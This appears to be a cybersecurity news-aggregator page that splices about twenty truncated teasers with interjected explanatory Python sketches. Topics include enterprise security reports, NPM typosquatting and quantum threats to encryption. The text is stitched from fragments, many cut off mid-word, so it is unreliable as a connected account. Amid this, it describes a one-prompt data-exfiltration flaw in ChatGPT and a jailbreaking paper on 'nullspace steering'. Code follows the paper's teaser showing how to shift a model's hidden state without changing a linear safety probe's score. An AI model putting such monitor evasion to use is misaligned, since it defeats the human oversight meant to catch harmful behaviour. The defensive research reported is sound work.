In the cybersecurity world, we often assume that small and medium-sized businesses (SMBs) are the lagging indicators of digital maturity. But new research from Tech.co and Expert Market suggests that SMB leaders are becoming surprisingly surgical in their tech adoption. The data reveal a major pivot in 2026: while many organizations are pulling back AI for general business tasks, automated cybersecurity remains a non-negotiable priority. As inflation pressures and tech regret drive a more sel
With attackers able to move at AI speed, defenders cannot rely on the techniques and instincts they have come to trust. "That means putting in place stronger identity controls," said Jack Butler, a senior enterprise solutions engineer at Sumo Logic, a SecOps vendor. "That means putting in place the more robust logging program and correlation engines to detect all of these in real time and reassess signals of trust. It needs to be reassessed dynamically."[1]
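The "correlation engines to detect all of these in real time" that Butler describes can be illustrated with a minimal sketch. This is not Sumo Logic's product logic; the rule, threshold, and window below are illustrative assumptions about what one basic trust-reassessment signal might look like: flag any identity with repeated failed logins inside a short window.

```python
from collections import defaultdict

# Minimal sketch of a real-time correlation rule (illustrative, not any
# vendor's engine): flag identities with `threshold` failed logins
# occurring within any `window`-second span.
def flag_suspicious_logins(events, threshold=3, window=60):
    """events: iterable of (timestamp_seconds, user, outcome) tuples,
    assumed sorted by timestamp. Returns the set of flagged users."""
    failures = defaultdict(list)   # user -> recent failure timestamps
    flagged = set()
    for ts, user, outcome in events:
        if outcome != "failure":
            continue
        # Keep only failures still inside the sliding window.
        recent = [t for t in failures[user] if ts - t <= window]
        recent.append(ts)
        failures[user] = recent
        if len(recent) >= threshold:
            flagged.add(user)
    return flagged

events = [
    (0, "alice", "failure"),
    (10, "alice", "failure"),
    (20, "alice", "failure"),   # three failures in 20s -> flagged
    (0, "bob", "failure"),
    (300, "bob", "failure"),    # too far apart -> not flagged
]
print(flag_suspicious_logins(events))  # → {'alice'}
```

A production engine would correlate across many signal types and reassess continuously, as Butler notes, but the core pattern is the same: a sliding window over an event stream with a threshold rule.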
As for what to do about the substan
SonicWall has launched its 2026 Cyber Protect Report, marking a significant shift in how the organization presents threat intelligence. Rather than focusing solely on raw data, the report prioritizes protection outcomes for business leaders. The findings indicate that while the volume of attacks remains high, adversaries are becoming more precise, with medium and high-severity incidents rising by over 20% to reach 13 billion hits.
One of the most significant findings in the 2026 report is the
The idea that artificial intelligence might one day rival human creativity has become a familiar theme in public conversation. Generative models can rapidly produce images, stories and designs, which makes it tempting to assume that they possess something like imagination. A new study published in Advanced Science challenges that assumption in a direct and illuminating way. By examining how humans and AI generate images from abstract prompts, the researchers show that what looks like creativity
Senior business leaders in the UK are experiencing a significant rise in job complexity, with artificial intelligence (AI) identified as a primary driver. A study by Alliance Manchester Business School (AMBS), based on a Censuswide survey of 500 UK managers, directors, and C-suite executives, reveals that almost three quarters (73%) of senior management have found their roles more complex since 2020 because of AI. This figure climbs to 79% among directors and C-suite personnel, and 82% among m
Users frequently entrust AI assistants with highly sensitive information, including medical records, financial documents, and proprietary business code. Check Point researchers have disclosed a critical vulnerability in ChatGPT's architecture that enables attackers to extract user data covertly. A flaw in ChatGPT's code execution environment demonstrated how a single malicious prompt could quietly exfiltrate sensitive user data without warning or user approval.[1]
The Vulnerability - OpenAI de
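The specifics of the flaw are Check Point's to detail, but the general defensive idea of scanning sandbox output for exfiltration indicators can be sketched. The patterns and threshold below are illustrative assumptions, not Check Point's research tooling or OpenAI's mitigation: one crude indicator of covert exfiltration is an outbound URL carrying a long base64-looking payload in a query parameter.

```python
import base64
import re

# Hypothetical defensive sketch: scan text produced inside a code-execution
# sandbox for outbound URLs whose query strings carry long base64-like
# payloads -- one crude indicator of covert data exfiltration.
URL_RE = re.compile(r"https?://[^\s\"']+")
B64_PARAM_RE = re.compile(r"[?&]\w+=([A-Za-z0-9+/=]{40,})")

def exfil_indicators(text):
    """Return URLs in `text` that carry a suspicious encoded payload."""
    return [url for url in URL_RE.findall(text) if B64_PARAM_RE.search(url)]

payload = base64.b64encode(b"ssn=123-45-6789 account=9987").decode()
sample = (
    "fetching https://example.com/docs then "
    "POST https://attacker.invalid/c?d=" + payload
)
print(exfil_indicators(sample))  # flags only the attacker URL
```

Real detection would be far more layered (egress allowlists, entropy scoring, DNS monitoring), but the sketch shows why unrestricted network access from a code-execution environment is the dangerous ingredient.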
If there's one thing AI is good at, language models in particular, it's quickly and accurately detecting patterns in datasets so large that humans could not practically sift through them all. That certainly seems to be the case with Anthropic's new general-purpose model, Claude Mythos: the company has announced that it used the model to detect "thousands of high-severity vulnerabilities, including some in every major operating system and web browser."
Alongside the launch o
On 28 February 2026, a joint US-Israeli military campaign struck Iranian nuclear facilities, military infrastructure, and leadership targets in what was officially called Operation Epic Fury. Social media was quickly flooded with false footage of the conflict, including massive explosions in Tel Aviv, successful Iranian missile strikes on US warships, and satellite imagery purporting to show damage to American military bases in the Gulf.
Some of this footage was recycled from unrelated conflicts,
If you've been using OpenClaw, the wildly popular agentic AI tool that took the developer community by storm, you should probably update it if you haven't done so already. OpenClaw, as has been reported in the past, has widely known security problems. From the beginning, OpenClaw creator Peter Steinberger has warned potential users on GitHub that "There is no 'perfectly secure' setup." Users can grant OpenClaw control over their devices and access to specific apps, local files, and logged-in accou
Rebranded as TrendAI, Trend Micro has published findings from a global study of 3,700 business and IT decision makers showing that 67% felt pressured to approve artificial intelligence projects despite security concerns. One in seven described those concerns as extreme, yet overrode them to match competitors and meet internal demands.
Chief Platform and Business Officer and Head of TrendAI, Rachel Jin, commented: “Organizations are not lacking awareness of risk; they’re lacking the conditions t
Every time you check your bank balance online, send an email, or make a purchase with a credit card, your information is protected by encryption, a mathematical shield that keeps your data safe from prying eyes. This encryption has worked extremely well for decades: the algorithms safeguarding your most sensitive data would take today's most powerful traditional computers millions of years to crack. However, a new type of machine is emerging that could change everything. That machine is the quantum c
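The asymmetry at the heart of this kind of encryption can be made concrete with a toy RSA example. The numbers below are wildly insecure and purely illustrative: encrypting with the public key is easy, but recovering the private key requires knowing the factors of the modulus, which is infeasible for classical computers at real key sizes yet would be efficient for a large-scale quantum computer running Shor's algorithm.

```python
# Toy RSA (insecure, textbook-sized numbers): security rests on the
# difficulty of factoring n back into p and q.
p, q = 61, 53                 # real keys use primes hundreds of digits long
n = p * q                     # public modulus (3233)
phi = (p - 1) * (q - 1)       # requires knowing p and q
e = 17                        # public exponent
d = pow(e, -1, phi)           # private exponent, derived from phi

msg = 65
cipher = pow(msg, e, n)       # anyone can encrypt with (e, n)
plain = pow(cipher, d, n)     # decrypting needs d, i.e. needs the factors
print(plain)  # → 65
```

With 61 and 53 any laptop factors n instantly; with 1024-bit primes no classical machine can, and that gap is exactly what a cryptographically relevant quantum computer would close.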
Security researchers have uncovered a new supply chain attack targeting the NPM registry with malicious code that exhibits worm-like propagation capabilities. Named Sandworm_Mode, the attack was deployed through 19 packages published under two aliases, relying on typosquatting to trick developers into executing the malicious code. According to cybersecurity firm Socket, the attack bears the hallmarks of the Shai-Hulud campaign that hit roughly 800 NPM packages in September and November 2
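Typosquatting works because a one- or two-character slip lands developers on a lookalike package. One common detection heuristic, sketched here with illustrative package names (this is not Socket's actual logic), flags any name within a small edit distance of a popular package.

```python
# Levenshtein edit distance via classic dynamic programming, used to
# flag names suspiciously close to popular packages. Illustrative only.
def edit_distance(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # deletion
                           cur[j - 1] + 1,               # insertion
                           prev[j - 1] + (ca != cb)))    # substitution
        prev = cur
    return prev[-1]

POPULAR = ["express", "lodash", "react", "axios"]

def likely_typosquat(name, max_dist=2):
    # Distance 0 is the real package; 1-2 is the typosquat sweet spot.
    return any(0 < edit_distance(name, p) <= max_dist for p in POPULAR)

print(likely_typosquat("expresss"))  # → True  (one inserted 's')
print(likely_typosquat("react"))     # → False (exact match, not a squat)
```

Registries and scanners layer many more signals on top (publish date, maintainer history, install scripts), but name proximity remains the cheapest first filter.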
Artificial intelligence is becoming woven into the fabric of daily life, from helping doctors summarize medical notes to assisting developers with complex code. As these systems move from novelty to infrastructure, the central question is no longer what they can do, but what happens when they are pushed to do what they should not. A recent research paper titled Jailbreaking the Matrix: Nullspace Steering for Controlled Model Subversion and a companion article from TechXplore explore this quest
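The paper's exact method is its own, but the linear-algebra idea suggested by the title can be sketched under stated assumptions: if a safety monitor is a linear probe on a model's hidden state, a perturbation projected into the nullspace of the probe's weight vector changes the hidden state while leaving the probe's score untouched. The vectors below are hypothetical toy values, not the paper's implementation.

```python
# Toy sketch of nullspace projection (illustrative, not the paper's code):
# remove from a steering perturbation its component along a linear probe's
# weights, so the probe's readout cannot see the change.
def dot(u, v):
    return sum(a * b for a, b in zip(u, v))

def project_to_nullspace(delta, w):
    """Return delta minus its component along w, so w . result == 0."""
    scale = dot(w, delta) / dot(w, w)
    return [d - scale * wi for d, wi in zip(delta, w)]

w = [1.0, 2.0, -1.0]    # hypothetical probe weights
h = [0.5, 0.5, 0.5]     # hypothetical hidden state
delta = [1.0, 1.0, 0.0] # desired steering direction

safe_delta = project_to_nullspace(delta, w)
h_steered = [a + b for a, b in zip(h, safe_delta)]

# The hidden state moved, but the probe's score is identical.
print(round(dot(w, h), 6), round(dot(w, h_steered), 6))
```

The unsettling implication, which the research explores in far more depth, is that a monitor blind along some directions can be steered around without tripping.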
Drones have emerged as a significant security concern for US military bases and critical infrastructure. These unmanned systems are typically low-cost, simple to operate, and difficult to detect using traditional air-defense sensors. A single drone can be deployed for surveillance, smuggling, or disruption, creating a scenario where security forces must respond swiftly without overreacting. To address this challenge, the US Army is adopting a new counter-drone platform known as DroneArmor. D
In 1978 the rock group The Who had a hit song, "Who Are You." That was rock 'n' roll, but the question now is, "Is it real, or is it fake?" Who are you? In modern digital enterprises, the fastest-growing identity population is no longer human users; it is machine identities. APIs, microservices, containers, cloud workloads, CI/CD pipelines, robotic process automation, and AI agents all authenticate using identities. Each relies on credentials such as keys, certificates
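One widely recommended answer to machine-identity sprawl is replacing long-lived static secrets with short-lived, signed credentials. The sketch below is a hedged illustration of that pattern, not any vendor's protocol: the token format, field names, and TTL are all assumptions, and real deployments would use standards like JWT/OIDC or SPIFFE.

```python
import base64
import hashlib
import hmac
import json
import time

# Illustrative short-lived machine credential: an HMAC-signed token with
# an expiry, instead of a static key that lives forever.
SECRET = b"issuer-signing-key"   # in practice, held only by the issuer

def issue_token(workload_id, ttl_seconds=300, now=None):
    now = time.time() if now is None else now
    claims = {"sub": workload_id, "exp": now + ttl_seconds}
    payload = base64.urlsafe_b64encode(json.dumps(claims).encode())
    sig = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()
    return payload.decode() + "." + sig

def verify_token(token, now=None):
    now = time.time() if now is None else now
    payload, sig = token.rsplit(".", 1)
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None                        # tampered or wrongly signed
    claims = json.loads(base64.urlsafe_b64decode(payload))
    return claims if claims["exp"] > now else None   # None once expired

tok = issue_token("ci-pipeline-42", ttl_seconds=300, now=1000.0)
print(verify_token(tok, now=1100.0))  # within TTL → claims dict
print(verify_token(tok, now=2000.0))  # expired → None
```

A stolen credential like this is worthless minutes later, which is exactly the property static keys and certificates lack.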
The past few years have brought an extraordinary shift in how digital content is created. Videos and images that once required studios, actors, and expensive equipment can now be produced by generative deep learning models that run on a laptop. These systems can fabricate a person’s face, voice, and gestures with such precision that the results often look indistinguishable from real footage. This technological leap has opened remarkable creative possibilities, yet it has also created a new kind
Quorum Cyber has published its 2026 Global Cyber Risk Outlook report[1], detailing a significant evolution in cyber threats driven by Artificial Intelligence (AI) and Ransomware-as-a-Service (RaaS) platforms. The analysis, based on incidents across more than 350 organizations worldwide in 2025, indicates that cybercrime has entered a more industrialized phase. This development allows even poorly skilled attackers to launch sophisticated operations, with nation-state actors automating up to 90%
Sentinel Labs has provided a keen look at LLMs in SOC operations. For security teams, AI promised to write secure code, identify and patch vulnerabilities, and replace monotonous security operations tasks. Its key value proposition was raising costs for adversaries while lowering them for defenders.
To evaluate whether Large Language Models (LLMs) were both sufficiently performant and reliable to be deployed in the enterprise, a wave of new benchmarks was created. In 2023, these early benc
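Whatever the individual benchmarks measure, most of them score a model the same basic way: run each item, grade the answer against a reference, and report a pass rate. The grader and items below are illustrative placeholders, not any real benchmark.

```python
# Minimal benchmark-scoring sketch (illustrative items and grader).
def pass_rate(model, items):
    """items: list of (prompt, expected) pairs; model: prompt -> answer."""
    passed = sum(1 for prompt, expected in items if model(prompt) == expected)
    return passed / len(items)

toy_model = {"2+2": "4", "capital of France": "Paris"}.get
items = [
    ("2+2", "4"),
    ("capital of France", "Paris"),
    ("sqrt(2) to 2 decimals", "1.41"),   # toy model fails this one
]
print(pass_rate(toy_model, items))  # two of three items pass
```

The hard part of benchmark design is not this arithmetic but everything around it: writing items that resist memorization, grading free-form answers, and keeping the test set out of training data.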
AI coding assistants are no longer just autocompleting lines of code; they are quietly making decisions for you. Tools like Claude Code can read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight. To make this possible, these assistants rely on plugin marketplaces, where third-party developers can offer 'skills' that teach the agent how to manage infrastructure, testing, and dependencies. Though powerful, the model requires a high d
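One mitigation often suggested for third-party agent skills is pinning: only enable a skill whose content matches a reviewed hash. The sketch below is a hypothetical illustration of that idea, not Claude Code's actual mechanism; the skill names and manifests are invented.

```python
import hashlib

# Hypothetical allowlist: skill name -> sha256 of its reviewed manifest.
ALLOWLIST = {
    "terraform-helper": hashlib.sha256(b'{"cmds": ["plan", "apply"]}').hexdigest(),
}

def can_enable(name, manifest_bytes):
    """Refuse any skill that is unlisted or whose manifest has changed
    since review -- a content-pinning defense against marketplace tampering."""
    pinned = ALLOWLIST.get(name)
    if pinned is None:
        return False                                   # unreviewed skill
    return hashlib.sha256(manifest_bytes).hexdigest() == pinned

print(can_enable("terraform-helper", b'{"cmds": ["plan", "apply"]}'))  # → True
print(can_enable("terraform-helper", b'{"cmds": ["rm -rf /"]}'))       # → False
print(can_enable("crypto-miner", b"{}"))                               # → False
```

Pinning shifts trust from "whatever the marketplace serves today" to "the exact bytes someone reviewed," the same principle behind lockfiles and signed packages.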
As the digital landscape continues to evolve, so too do the threats that organizations must contend with. In this year's final Reporter's Notebook conversation, cybersecurity experts Rob Wright from Dark Reading, David Jones from Cybersecurity Dive, and Alissa Irei from TechTarget Search Security share their insights on what the future holds for cybersecurity in 2026. Drawing from AI-summarized industry reports and expert opinions, the conversation highlights key trends, challenges, and oppor